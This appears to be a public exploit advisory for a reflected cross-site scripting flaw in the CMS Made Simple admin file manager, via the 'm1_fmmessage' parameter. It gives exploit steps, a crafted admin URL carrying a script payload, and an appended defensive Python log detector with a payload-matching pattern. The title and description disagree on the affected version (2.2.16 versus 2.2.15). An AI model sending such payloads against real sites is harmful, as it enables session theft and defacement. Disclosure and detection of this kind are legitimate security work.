CMS Made Simple 2.2.16 - Cross-Site Scripting (XSS) Zero-Day
Code:
# Exploit Title: CMS Made Simple 2.2.16 - 'm1_fmmessage' Cross-Site Scripting (XSS) Zero-Day
# Date: 2022/04/11
# Exploit Author: TurkHackTeam
# Vendor Homepage: http://www.cmsmadesimple.org/
# Software Link: https://s3.amazonaws.com/cmsms/downloads/14953/cmsms-2.2.16-install.zip
# Version: 2.2.16
# CVE: N/A
---------------------------------------------------------------------
Description:
A reflected cross-site scripting (XSS) vulnerability in CMS Made Simple 2.2.15
exists in the admin console via the 'm1_fmmessage' parameter, one of the global
request parameters. Once the user completes an action, the page returns a link
that carries the 'm1_fmmessage' parameter. Because this value is reflected into
the page without encoding, an attacker can execute JavaScript in the context of
the victim's browser if the victim opens a vulnerable page containing an XSS
payload, which can lead to cookie stealing, defacement and more.
Steps to exploit:
1) Navigate to http://www.cmsms.com/admin/moduleinterface.php and delete any
file in 'file manager'
2) Insert your payload in the 'm1_fmmessage' parameter of the response URL,
such as:
http://www.cmsms.com/admin/moduleinterface.php?mact=FileManager,m1_,defaultadmin,0&__c=34f443492bff76e8334&m1_fileactiondelete=&m1_path=%2Fuploads%2Fimages&m1_selall=a%3A1%3A%7Bi%3A0%3Bs%3A76%3A%22OGU0ODI3MjgzMDQxMjA3MjAzM2I3MDI3YjJhMDMzMTkzMmIwODkyMnx4c3NwYXlsb2FkLnR4dA%3D%3D%22%3B%7D&m1_submit=Delete&m1_fmmessage=deletesuccess<script>alert(1);</script>
3) Refresh the page
Boom :)
Proof of concept (PoC):
The following payload will allow you to run the JavaScript:
<script>alert(1);</script>
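Added example for defenders, not part of the original advisory: a small Python detector that parses constructed Apache-style access-log lines and flags requests to admin/moduleinterface.php whose 'm1_fmmessage' value carries markup or script fragments instead of a plain status keyword. The path and parameter name come from the advisory; the log lines, IPs, timestamps and the SUSPICIOUS_RE pattern are assumptions made for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not from the original advisory).
SAMPLE_LOG = """\
10.0.0.5 - - [11/Apr/2022:10:01:02 +0000] "GET /admin/moduleinterface.php?mact=FileManager,m1_,defaultadmin,0&m1_fmmessage=deletesuccess HTTP/1.1" 200 5120
10.0.0.9 - - [11/Apr/2022:10:02:17 +0000] "GET /admin/moduleinterface.php?mact=FileManager,m1_,defaultadmin,0&m1_fmmessage=deletesuccess%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E HTTP/1.1" 200 5200
10.0.0.7 - - [11/Apr/2022:10:03:44 +0000] "GET /index.php?page=home HTTP/1.1" 200 1800
"""

# Common log format: client, ident, user, [timestamp], "METHOD target PROTO"
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*"'
)
# A legitimate status keyword such as "deletesuccess" never contains markup
# characters, a javascript: URL or an inline event-handler attribute.
SUSPICIOUS_RE = re.compile(r'[<>"\']|javascript:|on\w+\s*=', re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into client, timestamp, path and query params."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    params = parse_qs(parts.query, keep_blank_values=True)
    return {'ip': m.group('ip'), 'ts': m.group('ts'),
            'path': parts.path, 'params': params}


def find_fmmessage_xss(log_text, param='m1_fmmessage'):
    """Return one record per request that reflects markup through `param`."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not rec['path'].endswith('/admin/moduleinterface.php'):
            continue
        for value in rec['params'].get(param, []):
            # parse_qs already decoded once; decode again so a double-encoded
            # payload (%253C...) is inspected in its final form as well.
            decoded = unquote(value)
            if SUSPICIOUS_RE.search(decoded):
                hits.append({'ip': rec['ip'], 'ts': rec['ts'], 'value': decoded})
    return hits


if __name__ == '__main__':
    for hit in find_fmmessage_xss(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} m1_fmmessage={hit['value']!r}")
```

The same check can be applied server-side as an input filter, but the root fix is to HTML-encode the message before it is written into the page.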
---------------------------------------------------------------------